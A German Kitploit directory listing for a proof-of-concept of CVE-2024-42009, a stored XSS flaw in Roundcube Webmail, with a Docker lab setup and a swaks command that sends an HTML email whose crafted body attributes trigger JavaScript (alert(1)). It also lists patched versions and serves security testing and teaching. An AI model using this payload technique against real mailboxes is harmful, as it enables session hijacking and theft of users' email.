Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-42009 | Kitploit
Tools/GitHubGitHub/zaidarif47/cve-2024-42009
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitLernen & BildungLabs & Praxis
GitHubzaidarif47/cve-2024-42009

CVE-2024-42009

Repository anzeigen
1vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-42009 – Roundcube Stored XSS (Docker PoC)

📌 Überblick

Dieses Repository demonstriert einen funktionierenden Proof-of-Concept (PoC) für CVE-2024-42009, eine Stored Cross-Site Scripting (XSS)-Sicherheitslücke in Roundcube Webmail.

Die Sicherheitslücke wird durch eine fehlerhafte HTML-Bereinigung mit anschließender unsicherer Attribut-Wiederverarbeitung verursacht, die es Angreifern ermöglicht, über manipulierte HTML-E-Mails bösartige Event-Handler einzuschleusen.


⚠️ Betroffene Versionen

  • Roundcube ≤ 1.5.7
  • Roundcube ≤ 1.6.7

🧠 Zusammenfassung der Sicherheitslücke

Roundcube bereinigt eingehende HTML-E-Mails, verarbeitet jedoch später bestimmte Attribute erneut (z. B. bgcolor, fehlerhafte Attribute), was zu Folgendem führt:

  • Verwirrung der Attributgrenzen
  • Einschleusung neuer Attribute
  • Wiedereinführung gefährlicher Event-Handler (z. B. onanimationstart)

Dies ermöglicht die Ausführung beliebigen JavaScripts, wenn ein Opfer eine bösartige E-Mail öffnet.


🐳 Einrichtung der Umgebung (Docker)

1. Repository klonen

root@kitploit:~
git clone https://github.com/ZaidArif47/CVE-2024-42009-PoC.git
cd CVE-2024-42009-PoC

2. Verwundbares Labor starten

root@kitploit:~
docker compose up -d

⏳ Warten Sie ~10–15 Sekunden, bis der Mailserver initialisiert ist.


3. Testbenutzer erstellen

root@kitploit:~
docker exec mailserver setup email add [email protected] 'attacker123'
docker exec mailserver setup email add [email protected] 'victim123'

4. Auf Roundcube zugreifen

root@kitploit:~
http://localhost:8080

Zugangsdaten:

  • [email protected] / victim123
  • [email protected] / attacker123

💣 Ausnutzung

Senden Sie die bösartige E-Mail mit dem swaks-Tool:

root@kitploit:~
swaks --to [email protected] \
      --from [email protected] \
      --server localhost:2525 \
      --header "Content-Type: text/html; charset=utf-8" \
      --header "Subject: CVE-2024-42009 PoC" \
      --body '<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(1) foo=bar">Foo</body>'

📸 Proof of Concept

  1. Melden Sie sich im Roundcube-Opferkonto an
  2. Öffnen Sie den E-Mail-Posteingang
  3. JavaScript wird ausgeführt (Alert erscheint)

1. Bösartige E-Mail zugestellt

Step 1

3. XSS ausgelöst

Step 3


🛡️ Gegenmaßnahmen

Aktualisieren Sie auf gepatchte Versionen:

  • Roundcube ≥ 1.6.8
  • Roundcube ≥ 1.5.8

📚 Referenzen

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-42009
  • Sonarsource: https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/#desanitization-in-inline-email-rendering-cve202442009

⚖️ Haftungsausschluss

Dieses Projekt dient ausschließlich Bildungs- und autorisierten Sicherheitsforschungszwecken. Verwenden Sie es nicht gegen Systeme ohne entsprechende Genehmigung.


Tool herunterladen